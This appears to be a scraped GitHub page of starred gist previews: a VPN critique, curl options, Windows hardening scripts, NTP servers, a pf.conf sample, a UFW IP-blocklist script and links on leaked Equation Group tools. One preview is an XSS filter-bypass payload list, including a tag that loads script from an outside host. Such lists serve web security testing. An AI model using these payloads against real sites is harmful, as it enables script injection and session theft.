Skip to content

Instantly share code, notes, and snippets.

View Atavic's full-sized avatar

Atavic

43 followers · 104 following
View GitHub Profile
@joepie91
joepie91 / vpn.md
Last active May 5, 2024 17:55
Don't use VPN services.

Don't use VPN services.

No, seriously, don't. You're probably reading this because you've asked what VPN service to use, and this is the answer.

Note: The content in this post does not apply to using VPN for their intended purpose; that is, as a virtual private (internal) network. It only applies to using it as a glorified proxy, which is what every third-party "VPN provider" does.

  • A Russian translation of this article can be found here, contributed by Timur Demin.
  • A Turkish translation can be found here, contributed by agyild.
  • There's also this article about VPN services, which is honestly better written (and has more cat pictures!) than my article.
@eneko
eneko / list-of-curl-options.txt
Last active May 5, 2024 08:50
List of `curl` options
$ curl --help
Usage: curl [options...] <url>
--abstract-unix-socket <path> Connect via abstract Unix domain socket
--alt-svc <file name> Enable alt-svc with this cache file
--anyauth Pick any authentication method
-a, --append Append to target file when uploading
--basic Use HTTP Basic Authentication
--cacert <file> CA certificate to verify peer against
--capath <dir> CA directory to verify peer against
-E, --cert <certificate[:password]> Client certificate file and password
@ricardojba
ricardojba / windows_hardening.cmd
Last active May 4, 2024 21:26
A Windows hardening script
::##########################################################################################################################
::
:: This script can ruin your day, if you run it without fully understanding what it does, you don't know what you are doing,
::
:: OR BOTH!!!
::
:: YOU HAVE BEEN WARNED!!!!!!!!!!
::
:: This script is provided "AS IS" with no warranties, and confers no rights.
:: Feel free to challenge me, disagree with me, or tell me I'm completely nuts in the comments section,
@mutin-sa
mutin-sa / Top_Public_Time_Servers.md
Last active May 4, 2024 20:35
List of Top Public Time Servers

Google Public NTP [AS15169]:

time.google.com

time1.google.com

time2.google.com

time3.google.com

@nathwill
nathwill / pf.conf
Last active May 4, 2024 03:05
a dummy's sample pf.conf
# $OpenBSD: pf.conf,v 1.52 2013/02/13 23:11:14 halex Exp $
#
# See pf.conf(5) for syntax and examples.
#
# Remember to set net.inet.ip.forwarding=1 and/or net.inet6.ip6.forwarding=1
# in /etc/sysctl.conf if packets are to be forwarded between interfaces.
### Macros
# system
@rvrsh3ll
rvrsh3ll / xxsfilterbypass.lst
Last active May 1, 2024 03:25
XSS Filter Bypass List
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
@mackwage
mackwage / windows_hardening.cmd
Last active April 28, 2024 20:54
Script to perform some hardening of Windows OS
:: Windows 10 Hardening Script
:: This is based mostly on my own personal research and testing. My objective is to secure/harden Windows 10 as much as possible while not impacting usability at all. (Think being able to run on this computer's of family members so secure them but not increase the chances of them having to call you to troubleshoot something related to it later on). References for virtually all settings can be found at the bottom. Just before the references section, you will always find several security settings commented out as they could lead to compatibility issues in common consumer setups but they're worth considering.
:: Obligatory 'views are my own'. :)
:: Thank you @jaredhaight for the Win Firewall config recommendations!
:: Thank you @ricardojba for the DLL Safe Order Search reg key!
:: Thank you @jessicaknotts for the help on testing Exploit Guard configs and checking privacy settings!
:: Best script I've found for Debloating Windows 10: https://github.com/Sycnex/Windows10Debloater
:
@aallan
aallan / mac-vendor.txt
Last active April 27, 2024 19:26
List of MAC addresses with vendors identities
000000 Officially Xerox
000001 SuperLAN-2U
000002 BBN (was internal usage only, no longer used)
000003 XEROX CORPORATION
000004 XEROX CORPORATION
000005 XEROX CORPORATION
000006 XEROX CORPORATION
000007 XEROX CORPORATION
000008 XEROX CORPORATION
000009 powerpipes?
@Ekultek
Ekultek / ufw-denier.sh
Created August 9, 2018 21:27
A script to download bad IP addresses and deny them with UFW
#!/bin/bash
TMP_DIR="/tmp"
URL_LINKS=$"http://www.blocklist.de/lists/ssh.txt
http://www.blocklist.de/lists/apache.txt
http://www.blocklist.de/lists/asterisk.txt
http://www.blocklist.de/lists/bots.txt
http://www.blocklist.de/lists/courierimap.txt
http://www.blocklist.de/lists/courierpop3.txt
http://www.blocklist.de/lists/email.txt
@bontchev
bontchev / EQgroup.md
Last active April 26, 2024 16:43
Curated list of links describing the leaked Equation Group tools for Windows

Links describing the leaked EQ Group tools for Windows

Repositories and ports

Installation and usage guides